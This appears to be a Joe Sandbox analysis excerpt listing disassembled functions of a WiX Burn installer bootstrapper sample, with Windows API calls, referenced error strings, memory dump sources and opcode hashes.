                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 409979828-0
                                                                                                                                                              • Opcode ID: fa04778fdf2e208714cda393782ddf639e29c43721bbb80220fe4ba4ba12e244
                                                                                                                                                              • Instruction ID: 79e9336a6914474d69e809750d4502cc15bd79d23b922e70cffd7cc59cd2e4f3
                                                                                                                                                              • Opcode Fuzzy Hash: fa04778fdf2e208714cda393782ddf639e29c43721bbb80220fe4ba4ba12e244
                                                                                                                                                              • Instruction Fuzzy Hash: 1B218932100204BFDB566F68EC0CD7B3FB8FF49360B164519F6169A2B0D7359810DB60
                                                                                                                                                              Strings
                                                                                                                                                              • WixBundleLastUsedSource, xrefs: 007DA1A1
                                                                                                                                                              • Failed to get bundle layout directory property., xrefs: 007DA287
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 007DA1B7
                                                                                                                                                              • Failed to copy source path., xrefs: 007DA31A
                                                                                                                                                              • Failed to combine last source with source., xrefs: 007DA210
                                                                                                                                                              • Failed to combine layout source with source., xrefs: 007DA2A4
                                                                                                                                                              • WixBundleLayoutDirectory, xrefs: 007DA26C
                                                                                                                                                              • Failed to get current process directory., xrefs: 007DA1F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                              • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                              • API String ID: 2767606509-3003062821
                                                                                                                                                              • Opcode ID: 399ba9971f93ea2b25f6850609b60f134c7b571c1f9b430ce85fe6092288b348
                                                                                                                                                              • Instruction ID: 14ec4f9fe35a4f339fcfda79d30dbfd263ab166e30fa0cf83406232e736c0de3
                                                                                                                                                              • Opcode Fuzzy Hash: 399ba9971f93ea2b25f6850609b60f134c7b571c1f9b430ce85fe6092288b348
                                                                                                                                                              • Instruction Fuzzy Hash: B3715C71D01619ABCF169FA8DC45AEEBBB9FF08310F14012AE911F7350E779AD418B62
                                                                                                                                                              APIs
                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 007C30C1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C30C7
                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 007C3121
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3127
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C31DB
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C31E5
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C323B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3245
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                              • String ID: pathutil.cpp
                                                                                                                                                              • API String ID: 1547313835-741606033
                                                                                                                                                              • Opcode ID: d1acf457be0f46d8302ac42b591b953efb0742f241a38e4a79a88ba91c79dfae
                                                                                                                                                              • Instruction ID: 96fa44a90b9dfef0294cb569d5e42dca40dbb769414793581e6cf1157524cb38
                                                                                                                                                              • Opcode Fuzzy Hash: d1acf457be0f46d8302ac42b591b953efb0742f241a38e4a79a88ba91c79dfae
                                                                                                                                                              • Instruction Fuzzy Hash: 8861A273D00629ABDF219AE48C45F9EBBA5BB04760F15816DEE11BB250E739DF0097D0
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 007C2E5F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C2E69
                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F09
                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 007C2F96
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C2FA3
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 007C2FB7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007C301F
                                                                                                                                                              Strings
                                                                                                                                                              • pathutil.cpp, xrefs: 007C2E8D
                                                                                                                                                              • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 007C2F66
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                              • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                              • API String ID: 3480017824-1101990113
                                                                                                                                                              • Opcode ID: 4da1590015badff3948d234366ceae4caa835007f5fcb825835961d8d74bc964
                                                                                                                                                              • Instruction ID: 380b469962995feea7d1decb61bb247e3c850e89b50a8fce62c0cec217ea2ce6
                                                                                                                                                              • Opcode Fuzzy Hash: 4da1590015badff3948d234366ceae4caa835007f5fcb825835961d8d74bc964
                                                                                                                                                              • Instruction Fuzzy Hash: FD716372D01129ABDB709F94DC49FAAB3B9AB08710F1041ADF914E7291D7389E81CFA0
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,007C53BD,00000000,007C5489,007C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 007CCC1C
                                                                                                                                                              Strings
                                                                                                                                                              • Payload was not found in container: %ls, xrefs: 007CCD29
                                                                                                                                                              • Failed to get next stream., xrefs: 007CCD03
                                                                                                                                                              • Failed to concat file paths., xrefs: 007CCCFC
                                                                                                                                                              • Failed to extract file., xrefs: 007CCCE7
                                                                                                                                                              • Failed to find embedded payload: %ls, xrefs: 007CCC48
                                                                                                                                                              • payload.cpp, xrefs: 007CCD1D
                                                                                                                                                              • Failed to get directory portion of local file path, xrefs: 007CCCF5
                                                                                                                                                              • Failed to ensure directory exists, xrefs: 007CCCEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                              • API String ID: 1825529933-1711239286
                                                                                                                                                              • Opcode ID: 48acc254e0298ed2a2242d5c4f08883cf71a6062e95b6fcf3be4159ce13dbaf4
                                                                                                                                                              • Instruction ID: 514ca34721da5cce77080ab955002c465083db1dcc48e0f3e51dd0bbf89b177b
                                                                                                                                                              • Opcode Fuzzy Hash: 48acc254e0298ed2a2242d5c4f08883cf71a6062e95b6fcf3be4159ce13dbaf4
                                                                                                                                                              • Instruction Fuzzy Hash: D141B231A00615EBCF369F48CC85F6EBB75FF00720B14816DE919AB292D7789D40DBA0
                                                                                                                                                              APIs
                                                                                                                                                              • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 007C47BB
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007C47C1
                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C484F
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to load UX., xrefs: 007C4804
                                                                                                                                                              • engine.cpp, xrefs: 007C489B
                                                                                                                                                              • Failed to start bootstrapper application., xrefs: 007C481D
                                                                                                                                                              • wininet.dll, xrefs: 007C47EE
                                                                                                                                                              • Unexpected return value from message pump., xrefs: 007C48A5
                                                                                                                                                              • Failed to create engine for UX., xrefs: 007C47DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CurrentPeekThread
                                                                                                                                                              • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                              • API String ID: 673430819-2573580774
                                                                                                                                                              • Opcode ID: 1ed85c544892de04ae48191323740e4cd0b5e6dd6ee14bbaf8e04c752488f210
                                                                                                                                                              • Instruction ID: 5af4aa620128a5cfe8c5189c4a92e5c545a976c536a3a7a69647b2bc57c63c59
                                                                                                                                                              • Opcode Fuzzy Hash: 1ed85c544892de04ae48191323740e4cd0b5e6dd6ee14bbaf8e04c752488f210
                                                                                                                                                              • Instruction Fuzzy Hash: 9A41BF71A00655EFEB609BA4CC99FBAB7ACFF04314F10012DF905E7280DB29AD0087A0
                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000), ref: 007E9D0F
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9D19
                                                                                                                                                              • CopyFileExW.KERNEL32(00000000,00000000,007E9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 007E9D67
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9D96
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                              • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                              • API String ID: 1969131206-836986073
                                                                                                                                                              • Opcode ID: c4840d8de3c5431df4541c5daa843afe536a4f2d1f9be07831ce87e5a6d66cfc
                                                                                                                                                              • Instruction ID: 631c0ffde08a73861009f137135affe84d8a56f1bdaa7fe75b8ffd4a9180e747
                                                                                                                                                              • Opcode Fuzzy Hash: c4840d8de3c5431df4541c5daa843afe536a4f2d1f9be07831ce87e5a6d66cfc
                                                                                                                                                              • Instruction Fuzzy Hash: 3A31E873B42665F7DB209A678C45EAB776CFF49B20B144118BE14EB351E629CD00C6F1
                                                                                                                                                              APIs
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 007D9007
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to secure cache path: %ls, xrefs: 007D8FEA
                                                                                                                                                              • Failed to create ACL to secure cache path: %ls, xrefs: 007D8FBB
                                                                                                                                                              • Failed to allocate access for Users group to path: %ls, xrefs: 007D8F72
                                                                                                                                                              • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 007D8F30
                                                                                                                                                              • cache.cpp, xrefs: 007D8FB0
                                                                                                                                                              • Failed to allocate access for Everyone group to path: %ls, xrefs: 007D8F51
                                                                                                                                                              • Failed to allocate access for Administrators group to path: %ls, xrefs: 007D8F0F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLocal
                                                                                                                                                              • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                                                              • API String ID: 2826327444-4113288589
                                                                                                                                                              • Opcode ID: c7470d39a13a89ccb761a2839d65c74494ff0cfb0f739e378f4feb0b638a97da
                                                                                                                                                              • Instruction ID: d5bc26ff269af7fef548700ff54268f8839de9a437b6ceb4968d2ccd8c0d2619
                                                                                                                                                              • Opcode Fuzzy Hash: c7470d39a13a89ccb761a2839d65c74494ff0cfb0f739e378f4feb0b638a97da
                                                                                                                                                              • Instruction Fuzzy Hash: 3541F632A40725F7DB6157508C06FAA767DEF50B10F1141A6FA08FA380EF799E4497E2
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 007D495A
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D4967
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 007D4A12
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D4A1C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                              • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                              • API String ID: 1948546556-773887359
                                                                                                                                                              • Opcode ID: 217fd91133cc782a7ee580edaedfa980d8fcbe5abc0afc00076ae9d991a4358a
                                                                                                                                                              • Instruction ID: fffc2ae16b4cbb16c8c96d35ff17f12f2afc4b716f45ef868b6aa9449f850ee3
                                                                                                                                                              • Opcode Fuzzy Hash: 217fd91133cc782a7ee580edaedfa980d8fcbe5abc0afc00076ae9d991a4358a
                                                                                                                                                              • Instruction Fuzzy Hash: FF31A832980229BBDB209BA5CC45BABB778FF04721F11C13AFD54E6340D778AD408AD4
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 00806C88
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00806CA5
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806CE3
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806D27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$CompareFree
                                                                                                                                                              • String ID: `<u$email$name$uri
                                                                                                                                                              • API String ID: 3589242889-1197142144
                                                                                                                                                              • Opcode ID: 7a5b466190a4cdf40da12ad2dfd78c46af31a22f8efd71d76dd9cca8932f6608
                                                                                                                                                              • Instruction ID: 0e237a5996043cefe6ed5d865e47d0c3ebbeb0ff760c3dac48d70181ef72c9fd
                                                                                                                                                              • Opcode Fuzzy Hash: 7a5b466190a4cdf40da12ad2dfd78c46af31a22f8efd71d76dd9cca8932f6608
                                                                                                                                                              • Instruction Fuzzy Hash: F0417E31A01219FBDB619B94CD45FADBB78FF04721F2042A4E920EB2E0E7319E60DB50
                                                                                                                                                              APIs
                                                                                                                                                              • LoadBitmapW.USER32(?,00000001), ref: 007DE2E5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE2F1
                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 007DE338
                                                                                                                                                              • GetCursorPos.USER32(?), ref: 007DE359
                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 007DE36B
                                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 007DE381
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                              • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                              • API String ID: 2342928100-598475503
                                                                                                                                                              • Opcode ID: 43b191742c45bb9fd078a8b2ce039d5bf1a3d8dbc85a6139688982663f9067a6
                                                                                                                                                              • Instruction ID: 68713c966d5f029974e9b7df09f4c95ef49082330fda0c36f0cf46c9118b2fbd
                                                                                                                                                              • Opcode Fuzzy Hash: 43b191742c45bb9fd078a8b2ce039d5bf1a3d8dbc85a6139688982663f9067a6
                                                                                                                                                              • Instruction Fuzzy Hash: DA315271A00219AFDB55DFA8D949A9EBBF4FF08710F158119F904EB381DB74E900CBA0
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,?,?,0080B500), ref: 007D50D3
• GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 007D5171
• CloseHandle.KERNEL32(00000000), ref: 007D518A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Process$CloseCurrentHandle
• String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
• API String ID: 2815245435-1352204306
• Opcode ID: f2bd58d44e6c932033987f5414fb565fb269ad9a05888aff293a0f1d7512566c
• Instruction ID: f7aab7fdbc80c03acbb6e42342a214c0924e37c805010f68af546ed5d9da708a
• Opcode Fuzzy Hash: f2bd58d44e6c932033987f5414fb565fb269ad9a05888aff293a0f1d7512566c
• Instruction Fuzzy Hash: 842168B190160DFFCF119F94CC42AAEBB78FF04350B50816AF821E2311D7369E509B91
APIs
• GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 007C68AC
• GetProcAddress.KERNEL32(00000000), ref: 007C68B3
• GetLastError.KERNEL32 ref: 007C68BD
Strings
• msi, xrefs: 007C68A3
• Failed to find DllGetVersion entry point in msi.dll., xrefs: 007C68EB
• DllGetVersion, xrefs: 007C689E
• Failed to get msi.dll version info., xrefs: 007C6905
• variable.cpp, xrefs: 007C68E1
• Failed to set variant value., xrefs: 007C6929
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
• API String ID: 4275029093-842451892
• Opcode ID: 2a07421b1e5a9c81d58f8d0d28c312af4c552256321bb86212f144536cec4e40
• Instruction ID: 62df5f481768a37965ba16bd9ee55ec2b565fc025ccc912d615d5b7f6f04386e
• Opcode Fuzzy Hash: 2a07421b1e5a9c81d58f8d0d28c312af4c552256321bb86212f144536cec4e40
• Instruction Fuzzy Hash: 0911B772A41739B6D7616BA98C86F7F7794EB04720F01052DFE11F6281D6789C0082E1
APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?), ref: 007CD6DA
• GetLastError.KERNEL32(?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?,?), ref: 007CD6E7
• GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 007CD71F
• GetLastError.KERNEL32(?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?,?), ref: 007CD72B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$AddressLibraryLoadProc
• String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
• API String ID: 1866314245-2276003667
• Opcode ID: 853540654d33861acf6f47e66ed689b1ba198ece959cd1a871456f282a14ac17
• Instruction ID: 0d786ed99870d15d470ac09f706a6e4d3c5eb1dc68525903335e7e803434d87b
• Opcode Fuzzy Hash: 853540654d33861acf6f47e66ed689b1ba198ece959cd1a871456f282a14ac17
• Instruction Fuzzy Hash: B3118277A80B32A7D73256955C09F5B6B94BB05B61F02853DBE64EB6C1EF28DC0086D0
APIs
• HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1186
• GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1191
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119F
• GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11BA
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C2
• GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D7
Strings
Memory Dump Source
